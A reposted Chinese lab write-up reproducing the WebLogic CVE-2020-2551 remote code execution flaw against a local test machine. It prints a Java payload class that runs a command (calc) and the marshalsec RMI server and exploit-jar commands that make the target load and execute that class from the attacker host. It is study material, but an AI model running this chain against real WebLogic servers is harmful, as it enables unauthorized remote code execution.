Weblogic CVE-2020-2551漏洞復現


漏洞原理

http://blog.topsec.com.cn/weblogic-cve-2020-2551%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/

https://www.cnblogs.com/-qing-/p/12682804.html

https://www.cnblogs.com/renhaoblog/p/13346294.html

環境搭建

靶機:win7 ip地址:192.168.177.129 WebLogic Server 版本: 10.3.6.0

攻擊機:win10 物理機 ip地址:192.168.177.1

漏洞復現

工具使用

先使用python腳本檢測漏洞:

 exp文件:

1.查看exp源代碼:

import java.io.IOException;
public class exp {
    static{
        try {
            java.lang.Runtime.getRuntime().exec(new String[]{"cmd","/c","calc"});
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
    public static void main(String[] args) {
        
    }
}

2.編譯exp生成class

進入文件所在目錄打開cmd,使用命令:javac exp.java -source 1.6 -target 1.6

3. 使用python啟動web服務

進入exp目錄打開cmd,使用命令啟動web服務:python3 -m http.server 80

4.啟動惡意RMI服務

進入目錄打開cmd,開啟服務命令:java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.177.1/#exp" 1099

 5.使用exp攻擊

使用命令加載exp攻擊靶機漏洞:java -jar weblogic_CVE_2020_2551.jar 192.168.177.129 7001 rmi://192.168.177.1:1099/exp

參考鏈接

https://www.cnblogs.com/loong-hon/p/10619616.html
https://bacde.me/post/Apache-Shiro-Deserialize-Vulnerability/

http://blog.topsec.com.cn/weblogic-cve-2020-2551%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/

https://www.cnblogs.com/-qing-/p/12682804.html

https://www.cnblogs.com/renhaoblog/p/13346294.html

免責聲明

嚴禁讀者利用以上介紹知識點對網站進行非法操作 , 本文僅用於技術交流和學習 , 如果您利用文章中介紹的知識對他人造成損失 , 后果由您自行承擔 , 如果您不能同意該約定 , 請您務必不要閱讀該文章 , 感謝您的配合 !

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM